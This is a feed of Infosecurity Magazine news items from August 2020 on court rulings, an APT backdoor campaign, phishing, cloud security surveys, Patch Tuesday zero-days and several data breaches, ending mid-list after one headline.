Feed aggregator

US Court Orders Defendant to Unlock Phones

Info Security - Thu, 08/13/2020 - 15:10
US Court Orders Defendant to Unlock Phones

A former Essex County sheriff's officer accused of obstructing a criminal investigation into a member of his motorcycle club has been ordered to make the contents of his cell phones accessible to law enforcement. 

The Supreme Court of New Jersey ruled on Monday that defendant Robert Andrews must comply with a search warrant by turning over the passcodes for his two phones. The court's decision was approved by four of the seven justices considering the matter.

Andrews was charged with official misconduct, hindering, and obstruction in 2016 for allegedly sharing information about an ongoing law enforcement investigation with the investigation's suspect. 

As part of the investigation, search warrants were drawn up requesting access to text messages and records of phone calls exchanged between Andrews and his fellow club member.

The defendant's attorney, Charles J. Sciarra, argued that Andrews should not have to surrender the passcodes of his cell phones because the Fifth Amendment to the US constitution states that no person "shall be compelled in any criminal case to be a witness against himself."

However, the court made the majority decision that Andrews' passcodes were not “testimonial” and drew attention to the fact that Andrews had not challenged the search warrants. 

Justice Lee Solomon’s opinion found “neither federal nor state protections against compelled disclosure shield Andrews’ passcodes.” 

Solomon wrote that under the terms of the unchallenged and lawfully issued search warrants, New Jersey had “the right to the cellphones’ purportedly incriminating contents.”

The decision to force Andrews to share his passcodes with law enforcement caused a dissenting justice to raise an important question regarding how much privacy American smartphone users can expect to have in the future.

Author of the dissenting opinion Justice Jaynee LaVecchia wrote: “Will we allow law enforcement—and our courts as their collaborators—to compel a defendant to disgorge undisclosed private thoughts—presumably memorized numbers or letters—so that the government can obtain access to encrypted smartphones?”

Describing the ruling's impact on the right of New Jersey residents to plead the fifth, Matt Adams, vice president of the Association of Criminal Defense Lawyers of New Jersey, said it “is taking a stick of dynamite to that fundamental right and imploding it from within."

Categories: Cyber Risk News

CactusPete Targets Eastern European Military

Info Security - Thu, 08/13/2020 - 14:34
CactusPete Targets Eastern European Military

An advanced persistent threat actor (APT) group has been caught cyber-spying on financial and military organizations in Eastern Europe.

CactusPete, also known as Karma Panda or Tonto Team, has been active since at least 2012 but appears to have ramped up its activities over the past year and a half. 

Researchers at Kaspersky were able to link hundreds of samples of a backdoor called Bisonal to a campaign orchestrated by CactusPete. The samples appeared between March 2019 and April 2020 at a pace of around 20 samples per month, which researchers believe "underscores the fact that CactusPete is developing rapidly."

The threat group's most recent wave of activity was first detected by researchers in February 2020, when they discovered an updated version of Bisonal. This version was linked to over 300 other samples in the wild using Kaspersky Threat Attribution Engine, a tool for analyzing malicious code for similarities with code deployed by known threat actors.

"This time, they’ve upgraded their backdoor to target organizations in the military and financial sectors in Eastern Europe, most likely in an effort to gain access to confidential information," wrote researchers.

"The speed at which the new malware samples are being created suggests the group is rapidly developing." 

Researchers found evidence that the group has refined its capabilities, gaining access to more sophisticated code like ShadowPad in 2020. They believe that CactusPete is on the hunt for "highly sensitive information" and warned organizations in the Eastern European region to be on alert.

Explaining how the threat group's malicious payload functions, researchers said: "Once installed on the victim’s device, the Bisonal backdoor it uses allows the group to silently start various programs, terminate any processes, upload/download/delete files, and retrieve a list of available drives. 

"In addition, as the operators move deeper into the infected system, they deploy keyloggers to harvest credentials and download privilege escalation malware to gradually gain more and more control over the system."

While previous campaigns by the group used spear-phishing to attack victims, researchers were unable to pin down how CactusPete is getting targets to download the latest version of their backdoor.

Categories: Cyber Risk News

Phishing Tactic Targets Verizon Users' Credentials

Info Security - Thu, 08/13/2020 - 13:01
Phishing Tactic Targets Verizon Users' Credentials

A new phishing tactic which targets Verizon customers to steal user credentials, passwords and personal details has been detected.

According to research by Armorblox, the email resembles a secure message from Verizon Support and is titled “Your attention is urgently required”. When the recipient clicked the link, they were led to a Verizon lookalike website (through a redirection) which asked them to part with their email, Verizon account password, email account password and phone number.

Speaking to Infosecurity, Arjun Sambamoorthy, co-founder and head of engineering at Armorblox, said by collecting the target’s credentials, the attackers are phishing for personal details, and allowing more emails to be sent from the victim’s domain which would appear to be legitimate. He also said successful access to the victim’s account would also allow access to details of any other users of the Verizon service.

Sambamoorthy also said the emails got through as they didn’t follow the traits of more traditional phishing attacks. In one case it used a Wicca follower page named “Black Sun Coven” as the parent domain. Sambamoorthy explained that domain was registered in August 2019 and used for the phishing attack 11 month later.

“Assuming the website being discussed here is legitimate, the attackers likely exploited vulnerabilities in the web server or the Content Management Systems (CMS) to host phishing pages on the legitimate parent domain without the website admins knowing about it,” he said.

Sambamoorthy said “a handful of users” had been impacted, and the attack was still under investigation, while he had seen similar tactics used for other services.

“We have seen variants of this attack,” he said. “Attackers do this to hijack the trust associated with these brands, induce urgency in their victims (e.g. Your Amazon delivery address is incorrect, There's a billing failure on your Netflix account), and in some cases to circumvent any company SSO rules that might be in place.”

As for the use of the Wicca follower page, Sambamoorthy said it was increasingly seeing attackers host phishing pages on dummy sites or on orphaned pages of legitimate websites. “They're able to do this by exploiting vulnerabilities in the web servers or CMS without website admins knowing about it. Based on our initial research, Black Sun Coven was most likely a dummy site the attackers created. The site didn't have any contact information and online searches for "Black Sun Coven" yielded unrelated results to the site in question.”

Categories: Cyber Risk News

IT Pros Name Misconfiguration #1 Cloud Security Threat

Info Security - Thu, 08/13/2020 - 10:30
IT Pros Name Misconfiguration #1 Cloud Security Threat

Configuration errors are the number one threat to cloud security, according to a new poll of IT and security professionals by Check Point.

The security vendor interviewed 653 industry professionals to compile its 2020 Cloud Security Report.

Three-quarters (75%) claimed to be “very” or “extremely” concerned about cloud security, with most (52%) believing that the risks are higher in the public cloud than on-premises.

The top four threats were cited as: misconfiguration (68%), unauthorized cloud access (58%), insecure interfaces (52%), and account hijacking (50%). 

These security concerns have created multiple barriers to further adoption of cloud services. The top inhibitor of adoption was a lack of qualified staff (55%), up from fifth place last year.

This may go some way to explaining respondents’ concerns around configuration errors, especially as 68% of these organizations are using two or more public cloud providers — adding to the complexity.

Other top barriers included budget constraints (46%), data privacy issues (37%), and a lack of integration with on-premises security (36%).

The number of organizations struggling with existing security tools also rose from last year, from 66% to 82% — indicating that many may still be trying to apply on-premises technologies to cloud environments.

The good news is that despite the current macroeconomic climate, 59% of organizations expect their cloud security budget to increase over the next 12 months, with respondents on average allocating 27% of their security budget to cloud security.

“The report shows that organizations’ cloud migrations and deployments are racing ahead of their security teams’ abilities to defend them against attacks and breaches. Their existing security solutions only provide limited protections against cloud threats, and teams often lack the expertise needed to improve security and compliance processes,” said TJ Gonen, head of cloud product line at Check Point. 

“To close these security gaps, enterprises need to get holistic visibility across all of their public cloud environments, and deploy unified, automated cloud-native protections, compliance enforcement and event analysis.”

Cloud security posture management (CSPM) tools are widely viewed as a best practice way to help mitigate the risk of misconfigurations. One provider, Trend Micro, claims that its Cloud One- Conformity product detects 230 million of these errors every single day.

Categories: Cyber Risk News

CASB Complexity Means Many Products Are Under-Utilized

Info Security - Thu, 08/13/2020 - 09:23
CASB Complexity Means Many Products Are Under-Utilized

Product complexity and a lack of in-house skills mean many organizations are failing to fully realize the benefits of their cloud access security broker (CASB) solutions, according to the Cloud Security Alliance (CSA).

The industry body polled over 200 IT and security professionals to better understand their challenges surrounding CASBs, which help organizations extend their security policies to the cloud.

It found that while 90% of organizations now use the software, half (50%) don’t have sufficient staff to make the most of them.

Over a third (34%) claimed that product complexity is also preventing them from realizing the solution’s full potential. In fact, over 30% admitted they have to use multiple CASB products to fulfil their security requirements.

Over half said they use CASBs to monitor user behavior (55%) and to provide insight into unauthorized access (53%). However, fewer than two-fifths (38%) use the tools for regulatory compliance and even fewer (22%) for internal compliance.

The solutions can help to bolster security and compliance by, for example, encrypting data using a company’s own keys before it reaches a SaaS provider. Identity and access management (IAM) is another popular feature, enabling IT managers to control how users log into apps and what corporate information they can view.

“CASB solutions have been underutilized on all the pillars but in particular on the compliance, data security, and threat protection capabilities within the service,” said Hillary Baron, lead author of the report and CSA research analyst.

“It’s clear that training and knowledge of how to use the products need to be made a priority if CASBs are to become effective as a service or solution.”

Back in 2018, it was predicted that 83% of enterprise workloads will be in the cloud by 2020. Yet cybersecurity concerns still remain a number one barrier to cloud adoption, according to many studies.

Categories: Cyber Risk News

Open Source Supply Chain Attacks Surge 430%

Info Security - Thu, 08/13/2020 - 08:53
Open Source Supply Chain Attacks Surge 430%

Security experts are warning of a 430% year-on-year increase in attacks targeting open source components directly in order to covertly infect key software supply chains.

There were 929 attacks recorded between July 2019 and May 2020, according to Sonatype’s annual State of the Software Supply Chain report. The study was compiled from analysis of 24,000 open source projects and 15,000 development organizations alongside interviews with 5600 software developers.

The targeting of open source components by malicious actors is concerning because of their popularity among DevOps teams to accelerate time-to-market.

According to the report, 1.5 trillion component download requests are projected in 2020 across all major open source ecosystems.

Node.js (npm) and Python (PyPI) repositories are thought to be among the most commonly targeted by attackers, as malicious code can be easily triggered during package installation.

This type of software supply chain attack is possible because in the open source world it is harder to discriminate between good and bad actors, and due to the inter-connected nature of projects, Sonatype claimed.

On the latter point, open source projects may have hundreds or thousands of dependencies on other projects that may contain known vulnerabilities which can be exploited.

In 2019, over 10% of global Java OSS downloads had at least one open source vulnerability, with new flaws being exploited in the wild within three days of public disclosure, the report claimed.

Today, 90% of components in an application are open source and 11% of those are known to contain vulnerabilities.

Sonatype CEO, Wayne Jackson, drew a distinction between “next-gen” upstream attacks and “legacy” software supply chain attacks, in which attackers go after vulnerabilities in products as soon as they are disclosed before organizations have time to remediate.

“Our research shows that commercial engineering teams are getting faster in their ability to respond to new zero day vulnerabilities,” he said.

“Therefore, it should come as no surprise that next generation supply chain attacks have increased 430% as adversaries are shifting their activities ‘upstream’ where they can infect a single open source component that has the potential to be distributed ‘downstream” where it can be strategically and covertly exploited.”

Development teams able to mitigate these risks are more likely to use automated software composition analysis (SCA) tools across the dev lifecycle, and centrally maintain a software bill of materials (SBOMs) for applications, the report claimed.

Categories: Cyber Risk News

Human Error Threatens Cloud Security

Info Security - Wed, 08/12/2020 - 17:39
Human Error Threatens Cloud Security

Virtually all security professionals believe that human error could put the security of cloud data at risk, according to new research published today.

A survey commissioned by Tripwire and carried out last month by Dimensional Research found that 93% of security professionals were concerned that human error could result in the accidental exposure of their cloud data. 

Despite their concern over human error, 22% of those surveyed said that they assess their cloud security posture manually. 

The survey evaluated the opinions of 310 security professionals on the implementation of cloud security best practices. 

According to the research, a number of organizations experience difficulties in monitoring and securing their cloud environments. A majority of security professionals (76%) state they have difficulty maintaining security configurations in the cloud, and 37% said their risk management capabilities in the cloud are worse compared with other parts of their environment.

Other findings were that security professionals tend not to keep tabs on their real-time cloud security situation. Only 21% of organizations were found to assess their overall cloud security posture in real time or near real time. 

While 21% said they conduct weekly cloud security evaluations, 58% said they wait until a month or more has gone by.

Maintaining security was a challenge for most organizations, with only 22% saying that they are able to maintain continuous cloud security compliance over time.

“Security teams are dealing with much more complex environments, and it can be extremely difficult to stay on top of the growing cloud footprint without having the right strategy and resources in place,” said Tim Erlin, vice president of product management and strategy at Tripwire. 

“Fortunately, there are well-established frameworks, such as CIS benchmarks, which provide prioritized recommendations for securing the cloud. However, the ongoing work of maintaining proper security controls often goes undone or puts too much strain on resources, leading to human error.” 

The amount of automation employed varied across cloud security best practices. While 51% use automated alerts with context for suspicious behavior, only 45% automatically assess new cloud assets as they are added to the environment.

Categories: Cyber Risk News

FireEye Announces Bug Bounty Program

Info Security - Wed, 08/12/2020 - 17:09
FireEye Announces Bug Bounty Program

California cybersecurity company FireEye today announced that it is opening up its bug bounty program to the public. 

FireEye previously set up a private bug bounty program in partnership with Bugcrowd. As of today, the company is extending the program to any researcher who registers through the Bugcrowd platform.  

A spokesperson for FireEye said: "While we’ve been heavily involved with responsible disclosure, including helping other companies set up and modify their own programs, we are taking the next step in this effort."

Over the coming months, researchers will be invited to seek out weaknesses in FireEye's products, services, business applications, and infrastructure security. Cash rewards ranging from $50 to $2,500 will be offered per vulnerability detected. 

Vulnerabilities submitted as part of the program will typically be accepted or rejected within 5 days. 

A spokesperson for the company said: "As security researchers ourselves, FireEye understands the importance of investigating and responding to security issues. We also realize that despite our efforts to eradicate security vulnerabilities from our products and services, there will always be emerging threats, new vulnerabilities, and opportunities to improve. 

"To that end, FireEye believes wholeheartedly in embracing the public research community when security issues are discovered and working with security researchers to fix the identified issue and remediate any related and/or underlying systemic issues to further improve our security posture."

Threats are split into four different levels of technical severity ranging from low to critical. The program will use the Bugcrowd Vulnerability Rating Taxonomy for the initial prioritization/rating of findings.

Website testing targets listed in the scope include fireeye.com, fireeye.market, fireeye.dev, mandiant.com, flare-on.com, and cloudvisory.com. Third-party products that may be used by FireEye as well as FireEye systems or products in AWS GovCloud are not within the scope.

Bug bounty hunters have been warned by the company not to perform research on FireEye products licensed, owned, or operated by a FireEye customer without their express permission.

Researchers who prefer not to receive payment for their work, or who wish to report product- or services-related findings, can do so via the FireEye Responsible Disclosure program that is also managed by Bugcrowd.

Categories: Cyber Risk News

Pace Center for Girls' Donor Data Breached

Info Security - Wed, 08/12/2020 - 16:39
Pace Center for Girls' Donor Data Breached

A non-profit social services agency in Florida has been hit by a data breach after a security incident affected one of its outside vendors.

Pace Center for Girls has issued a warning to its supporters after the organization discovered some of its data had been affected by a May security breach at Blackbaud

South Carolina–based cloud computing provider Blackbaud had been engaged by the Pace Center as a fundraising and donor software provider. 

Mary Marx, president and CEO of Pace, said that while the Center's internal record-keeping had not been affected by the breach, some information belonging to its donors and fundraisers had been impacted. 

Data affected included donors’ names, physical addresses, phone numbers, birthdates, and donor profile information, such as giving history.

“We don't keep credit card information or Social Security information on our database," said Marx. 

Pace is one of the more than 200 organizations that have been impacted by the Blackbaud security incident. Other victims include the Boy Scouts of America, the National Trust, and more than ten universities in the UK, US, and Australia. 

“We wanted to make you aware of a security breach experienced by our fundraising and donor software provider, Blackbaud, that was reported to us in mid-July,” Pace told its donors and fundraisers in an email dated August 5.

“Our team worked on the system with them to find out what happened.” 

The Center said it was maintaining communications with Blackbaud “to ensure we can be immediately informed of any further developments."

Following the breach, Pace said it "will be rolling out additional intensive authentication processes to further protect our data.” The non-profit already uses encryption to protect all sensitive information. 

The Pace Center for Girls was set up in 1985 to provide education, counseling, training, and advocacy to girls and young women as an alternative to institutionalization or incarceration. 

Today, Pace serves over 3,000 girls a year through 21 centers dotted throughout Florida.

Marx said that the funding Pace relies on to deliver its services comes from a collection of approximately 30,000 donors that includes corporations, foundations, and individuals. 

Categories: Cyber Risk News

Incident Response Exercises Not Taken Seriously by Business Leaders

Info Security - Wed, 08/12/2020 - 12:15
Incident Response Exercises Not Taken Seriously by Business Leaders

Only 2% of organizations have run incident response scenarios related to the pandemic response.

According to research by Immersive Labs of 402 organizations, nearly 40% are not fully confident in their teams training to handle a data breach if one occurred, and 65% of exercises consist of reviewing PowerPoint slides.

In an email to Infosecurity, Heath Renfrow, director and vCISO at the Crypsis Group, said incident response is one of the pillars of a sound information security program, and it needs to be taken more seriously—not only among the organization’s information security team, but all the way to the CEO and board of directors.

“It is evident from the incident response cases we assist with daily that incident response is frequently viewed strictly as information security/IT’s responsibility, rather than from an overall business perspective,” he said. “This is unfortunate, because many across the business—from leadership to legal, communications and HR staff—have a potential role to play and can help influence better outcomes and the right cultural mindset to be better prepared for an incident.”

Renfrow said that to build stronger programs, incident response plans and playbooks should be developed and exercised at a broad company level — but that requires buy-in from the top leadership.

He recommended an approach, in order to achieve buy-in, to first run tabletop exercises just among the information security team to refine the plan, taking the lessons learned and updating the documents. Next, identify a “champion” in the executive ranks — a cybersecurity advocate who is influential among leadership and sit down with inside or outside counsel and discuss the various scenarios the company could face from a range of cyber-attacks and the ramifications of each (e.g. downtime, reputational loss, regulatory notifications, sensitive information exposed, etc).

“With that information in hand, security teams can work with their identified champion to get executive leadership educated on those risks and bought into an incident response tabletop exercise,” he said.

The Immersive Labs research also found that 61% of respondents think having an incident response plan is the single most effective way to prepare for a security incident, however when they do perform crisis exercises, nearly 40% of all senior security leaders surveyed said the last exercise generated no action from the business.

Also a quarter of organizations ran crisis exercises without senior cybersecurity leadership in attendance, and only 20% of exercises involved communications team members.

James Hadley, CEO of Immersive Labs, said: “With three-quarters of organizations agreeing that business continuity was at the forefront of their minds, it is time to close the gap between attackers and defenders and shake up the outdated status quo. This requires faster, shorter crisis drills run with the people you will be standing shoulder to shoulder with when the worst happens. Crisis exercises must be made more contemporary.

“Dusting off the three-ring binder crisis plan does not cut it today. In the first 30 minutes of a crisis, it is highly unlikely you’re thinking of your plan. It’s the real-life, crisis simulation training that prepares organizations to effectively respond to security incidents.”

Renfrow said a company-wide incident response exercise should include legal, HR, communications, and all senior business executives including the CEO, and should be focused on a plausible cyber-incident, for example, a ransomware attack, and walk through the chain of events and response by the entire organization. It should also include the steps needed to engage (as applicable) any retained cyber insurance companies, outside counsel, and incident response providers.

“These exercises truly do open the eyes of executive leadership, and most of the time they really start seeing cybersecurity as an asset to the business that is vital to the overall success of the organization,” Renfrow said.

Categories: Cyber Risk News

Microsoft Patches 120 CVEs Including Two Zero Days

Info Security - Wed, 08/12/2020 - 11:10
Microsoft Patches 120 CVEs Including Two Zero Days

It was another big Patch Tuesday this month with over 100 CVEs fixed by Microsoft, including two being actively exploited in the wild.

Of the 120 vulnerabilities addressed this month, 17 were rated critical. Experts agreed that system administrators should focus on the two zero-day bugs.

“The first, CVE-2020-1464, is a spoofing vulnerability in Windows Operating System. The vulnerability exists in the way Windows validates file signatures,” explained Recorded Future senior security architect, Allan Liska.

“When this vulnerability is exploited, it allows an attacker to bypass security features to allow improperly signed files to be loaded. This vulnerability impacts Windows 7 through Windows 10 and Windows Server 2008 through 2019.”

The second priority is CVE-2020-1380, a remote code execution vulnerability in Microsoft’s Scripting Engine related to how objects in memory are handled by Internet Explorer.

Successful exploitation, via an infected web page or malicious doc with embedded ActiveX control, would enable an attacker to execute arbitrary code as the current user, according to Satnam Narang, staff research engineer at Tenable.

“If said user happens to have administrative privileges, the attacker would be able to perform a variety of actions including creating accounts with full privileges, accessing and deleting data and installing programs,” he warned.

“This vulnerability has reportedly been exploited in the wild as a zero-day, likely as part of a targeted attack.”

Elsewhere, CVE-2020-1554, CVE-2020-1492, CVE-2020-1379, CVE-2020-1477, and CVE-2020-1525 are all critical RCE vulnerabilities in the Windows Media Foundation (WMF), a framework that has now been hit by 10 critical bugs this year, according to Liska.

Adding to the workload for system admins, Adobe fixed 26 CVEs in Acrobat and Reader and Apple resolved 20 CVEs in iCloud yesterday.

Categories: Cyber Risk News

Police Use of Facial Recognition Ruled Unlawful in World First Case

Info Security - Wed, 08/12/2020 - 09:15
Police Use of Facial Recognition Ruled Unlawful in World First Case

Rights groups are celebrating after the Court of Appeal ruled that the use of facial recognition (AFR) technology by South Wales Police is unlawful, although the force may not stop future pilots.

The case was brought by Liberty and activist Ed Bridges, 37, from Cardiff, whose image had been captured twice in 2017 and 2018 as police trawled through crowds to match the images with suspects' headshots in their database.

Although the case was thrown out by the High Court, the appeals judges ruled in Bridges’ favor on three counts, including two related to a breach of his right to privacy under article 8 of the European Convention on Human Rights.

On the third count, the judges agreed that the police force had failed to satisfy itself that “everything reasonable which could be done had been done in order to make sure that the software used does not have a racial or gender bias.”

Liberty hailed the victory in what it claimed was the world’s first legal challenge to police use of AFR and called for its outright ban, adding that as many as 500,000 innocent people may have had their facial images captured by South Wales Police.

“This judgment is a major victory in the fight against discriminatory and oppressive facial recognition,” argued Liberty lawyer, Megan Goulding.

“The court has agreed that this dystopian surveillance tool violates our rights and threatens our liberties. Facial recognition discriminates against people of colour, and it is absolutely right that the court found that South Wales Police had failed in their duty to investigate and avoid discrimination.”

However, the victory could be short-lived. Although the force is not planning to take an appeal to the Supreme Court, South Wales Police chief constable Matt Jukes said after the verdict that “I am confident that this is a judgement we can work with.”

All eyes will now be on the government to push ahead with long overdue plans to draw up a statutory code of practice, as advocated by privacy regulator the Information Commissioner’s Office (ICO).

Categories: Cyber Risk News

A Third of UK Unis Hit By Ransomware in Last 10 Years

Info Security - Wed, 08/12/2020 - 08:20
A Third of UK Unis Hit By Ransomware in Last 10 Years

Around a third (33%) of UK universities have been targeted with ransomware, freedom of information (FOI) requests submitted by the agency TopLine Comms have revealed.

Of the 134 universities the requests were sent to, 105 responded. Of these, 35 (33%) revealed they had been subjected to attack while 25 (24%) said they hadn’t. The remaining 43 (45%) refused to answer, with the main concern being that admission of attack could lead to further targeting.

Those that refused to answer the FOI added that no inference should be drawn from the refusal as to whether they’d been attacked or not.

Of the 35 universities that admitted to having faced ransomware attack, 34 confirmed they did not pay ransoms, with just one, Liverpool John Moores, refusing to disclose whether they had paid a ransom or not.

Whilst most attacks were isolated incidents, Sheffield Hallam University stood out as it had reported 42 ransomware attacks since 2013. It was followed by City, University of London, which has been targeted seven times since 2014.

The years in which the greatest total number of incidents occurred were in 2015 (31%), 2016 (34%) and 2017 (23%).

Ransomware attacks on universities has been brought into sharper focus recently following the admission by University of California San Francisco in June that it had paid over $1.14m to criminals after discovering that critical academic data related to its COVID-19 research had been encrypted.

Luke Budka, head of digital PR and SEO at TopLine Comms, said: “The recent revelation that hackers extorted $1.14m from the University of California prompted us to submit requests to UK universities asking for details on ransomware attacks and ransom amounts paid. We were naturally most interested in Russell Group universities as their research focus suggests they’ve got the most valuable intellectual property.

“Of the 18 Russell Group universities that responded, all but three refused to answer the questions submitted. The University of Manchester admitted it had been attacked but said it didn’t record when; The University of Sheffield was attacked in 2015 and The University of Edinburgh stated it had not been attacked in the last ten years.”

Speaking to Infosecurity about the findings, Steven Furnell, professor of cybersecurity at the University of Nottingham, commented: “The fact that a third indicated that they had been ‘subject to an attack’ really just serves to confirm the prevalence of the threat – which in itself is not a surprise, as we know ransomware has been a significant element of the threat landscape for the last few years.”

He noted that universities are potentially particularly vulnerable to ransomware attack because of the varied mix of users connecting into the networks across a wide range of devices, including students’ personal devices.

Furnell added: “In terms of what they ought to doing to protect themselves, it is essentially the same as other large organizations – ensuring an effective combination of technical safeguards to detect and prevent the incidents, alongside awareness-raising for staff and students in order to reduce the chances of them inadvertently assisting the threat or losing their own data if a breach was to occur.”

Categories: Cyber Risk News

SANS Institute Phishing Attack Leads to Theft of 28,000 Records

Info Security - Wed, 08/12/2020 - 08:16
SANS Institute Phishing Attack Leads to Theft of 28,000 Records

The SANS Institute has revealed that hundreds of emails from an internal account were forwarded to an unknown third party, compromising 28,000 records of personally identifiable information (PII).

The global cybersecurity training and certifications organization said in a statement that the incident came to light on August 6 after a regular review of email configuration identified a “suspicious forwarding rule.”

“This rule was found to have forwarded a number of emails from a specific individual's e-mail account to an unknown external email address,” it continued.

“The forwarded emails included files that contained some subset of email, first name, last name, work title, company name, industry, address, and country of residence. SANS quickly stopped any further release of information from the account.”

In total, 513 emails were forwarded to the external address, exposing nearly 30,000 records of PII. A malicious Office 365 add-on was apparently installed on the victim’s machine as part of the attack.

“We have identified a single phishing e-mail as the vector of the attack,” SANS explained. “As a result of the e-mail, a single employee's email account was impacted. Aside from the affected user, we currently believe that no other accounts or systems at SANS were compromised.”

The firm said its digital forensics team is currently investigating whether any other information was compromised, and to identify any opportunities to build resilience into its defenses and improvements into its incident response for the future.

No passwords or financial information was taken in the attack, and all affected individuals have now been notified, SANS said.

Refreshingly, the organization added that it may run an online session on the incident once the investigation is completed, “if there is information that we think would be useful to the community.”

Infosecurity has reached out to SANS for more information on the incident and will update the story if we hear back.

Categories: Cyber Risk News

Australian Jailed for Stealing XRP Crypto

Info Security - Tue, 08/11/2020 - 17:30
Australian Jailed for Stealing XRP Crypto

An Australian woman has been jailed for her part in the theft of XRP cryptocurrency worth nearly $400,000. 

Kathryn Nguyen was arrested in October 2018 for pulling off a crypto-heist with an associate. The 25-year-old was one of the first people in Australia to be charged with the theft of cryptocurrency.

The theft of 100,000 XRP tokens took place in January 2018, when the value of the currency  was at an all-time high of $3.84 per token. Currently, the tokens are worth approximately $0.30 each. 

Along with her accomplice, Nguyen stole the tokens from the account of a 56-year-old man with whom she shared the same last name. She then swapped the two-factor authentication to her own cell phone. 

Nguyen reportedly used a Chinese cryptocurrency exchange to swap the tokens for Bitcoin (BTC). In what may have been an attempt to launder the stolen funds, the Bitcoin was distributed across multiple wallets.

Police raided Nguyen’s home in the Sydney suburb of Epping in 2019, seizing phones, computers, and money. In August last year, the former Bitcoin trader turned handbag and shoe repairer pleaded guilty to fraud.

Today, Nguyen was sentenced to a maximum of two years and three months behind bars. She will be eligible for parole in October 2021. 

Presiding judge Chris Craigie said it was a “difficult and troubling decision” to hand Nguyen a jail sentence. According to News Corp, character references given regarding Nguyen portrayed her as having a “generous and hardworking personality.”

“A common thread was the offender’s willingness to help others,” Craigie said. “This takes on a different meaning in her willingly participating and assisting in a criminal enterprise.”

Craigie shared the opinion that the defendant's “moral judgement was distorted” when she committed the crime. 

The investigation into Nguyen was launched after the victim told police that he had been locked out of his cryptocurrency trading account. Police then spent nearly a year building the case against Nguyen.

Commander of NSW Cybercrime Squad, Detective Superintendent Matthew Craft, said cybercrimes in Australia often went unreported.

“The problem we have nationally—not just in New South Wales—is that the reporting rate for cyber-related crimes is very low,” Craft said.

Categories: Cyber Risk News

Cyber-Harassment Charges Dropped Against Nutley Cop Photo Tweeters

Info Security - Tue, 08/11/2020 - 16:27
Cyber-Harassment Charges Dropped Against Nutley Cop Photo Tweeters

Cyber-harassment charges brought against five people who sought to publicly identify a New Jersey cop on Twitter have been dropped.

The defendants were accused of causing Nutley Police Detective PJ Sandomenico to fear that harm would come to himself, his family, and his property by sharing a photograph of the officer performing his duties at a Black Lives Matter protest on June 26. 

An image of Sandomenico wearing a face mask that read "blue lives matter" was posted on Twitter by Kevin Alfaro of Belleville under the username kevi7 along with the comment "If anyone knows who this b***h is throw his info under this tweet." 

The post was subsequently retweeted by four other people, including Nutley resident Andrew Koslecki; Belleville residents Diana Lubizaca and Kamila Mikulec; and Queens Village, New York, resident Georgana Sziszak. 

Six weeks later, the defendants, all of whom were aged between 18 and 21, received summonses in the mail. If convicted of cyber-harassment in New Jersey, each of the Twitter users could have been slapped with a $10,000 fine and served 18 months in state prison for committing a fourth-degree felony.

Speaking on Friday, August 7, Katherine Carter, a spokeswoman for the prosecutor's office, said: "After reviewing the cases, we concluded there was insufficient evidence to sustain our burden of proof. Consequently, we moved today to dismiss all charges."

After receiving her summons, Sziszak started a GoFundMe page to foot her legal bills and raised nearly $10k. 

Commenting on her decision to re-tweet the post featuring Sandomenico, Sziszak said on her page: "On Friday, June 26, my friend attended a BLM solidarity ride out/protest. At the protest, they were met with anti-BLM counter-protestors; separated by a wall comprised of officers from the Police Department. 

"I physically did not attend this protest but shared my support by RETWEETING his tweet. His tweet was a picture of the cop turning his back and his badge # was NOT VISIBLE. My friend stated that he felt threatened by this cop and attempted to specifically identify this cop via tweeting.  

"The purpose of this tweet was to find out the officer's information, to hold him accountable.”

Categories: Cyber Risk News

Public Sector Outperforming Private in Data Management Although Challenges Remain

Info Security - Tue, 08/11/2020 - 13:30
Public Sector Outperforming Private in Data Management Although Challenges Remain

The public sector is ahead of other industries when it comes to data efficiency and usability, according to a study by Veritas Technologies.

Whilst 30% of the data stored by public sector organizations has a known value, just 15% falls into this category in general industry. In addition, public sector data considered redundant, obsolete and trivial (ROT) is half that of private sector companies.

However, substantial data challenges remain in the public sector, which has the same rate of dark data stored as industry counterparts (50%). This means significant public money is being spent on backing up data with unknown value.

Worryingly, in the survey of 100 public sector IT leaders, more than a quarter (27%) said they never tag data, mainly due to the belief that it is a laborious and expensive process.

Andy Warren, UK&I director, public sector, at Veritas Technologies, commented: “The average survey respondent was spending as much as £696,460 a year on data storage, half of which is dark. Tagging data, as basic as it sounds, is the first step in getting control of it, and can very effectively form the foundation to a program that reduces cost and increases efficiency.”

An apparent reluctance to store data in the cloud could also be preventing efforts to improve data efficiency, with just 17% of public sector information currently held on this platform.

Nevertheless, there is growing awareness of the need to improve data management across the sector; the study found that a high proportion of public sector IT leaders consider increasing internal data visibility (68%) and improved data sharing between teams (59%) to be priorities.

Warren added: “The challenge is real, and so much progress has already been made in the public sector in spite of cost limitations and large swathes of extremely sensitive data. However, provable cost savings can still be realized by consolidating infrastructure, understanding the data estate and deleting what isn’t needed. The technology is now available to reduce costs, improve efficiency and aid compliance.”

Categories: Cyber Risk News

Data Breach at Illinois Healthcare System

Info Security - Tue, 08/11/2020 - 12:57
Data Breach at Illinois Healthcare System

Illinois healthcare system FHN has notified patients of a data breach that took place in February. 

An investigation was launched by the Freeport-based healthcare provider after it transpired that the email accounts of a number of employees had been compromised. 

According to a notice issued by FHN, the alarm was raised when suspicious activity was spotted within the compromised email accounts. FHN responded by securing the accounts and hiring a "leading computer forensic firm" to determine what had occurred. 

The investigation into the incident concluded on April 30 and determined that an unauthorized person accessed the accounts between February 12 and February 13. 

FHN stated: "The investigation was unable to determine whether the unauthorized person actually viewed any emails or attachments in the accounts. Out of an abundance of caution, we reviewed the emails and attachments contained in the email accounts to identify patient information that may have been accessible to the unauthorized person."

After reviewing the emails and attachments that were compromised in the incident, FHN found that sensitive data belonging to some patients had been accessible to the unauthorized third party. 

Information exposed in the data breach included some patients’ names, dates of birth, medical record or patient account numbers, health insurance information, and limited treatment and/or clinical information, such as provider names, diagnoses, and medication information.

In some instances, patients’ health insurance information and/or Social Security numbers were also identified in the compromised email accounts. 

"This incident did not affect all FHN patients, but only those patients whose information was contained in the affected email accounts," stated FHN.

FHN is offering complimentary credit monitoring and identity protection services to those patients whose Social Security numbers and/or drivers’ license numbers were exposed in the incident.

FHN announced on July 31 that patients had been notified of the data breach. The company said it was taking steps to prevent future cyber-incidents. 

"To help prevent something like this from happening in the future, we have reinforced education with our staff regarding how to identify and avoid suspicious emails and are making additional security enhancements to our email environment, including enabling multi-factor authentication," stated FHN.

Categories: Cyber Risk News

British MSPs Apply for Government Furlough Scheme

Info Security - Tue, 08/11/2020 - 11:30
British MSPs Apply for Government Furlough Scheme

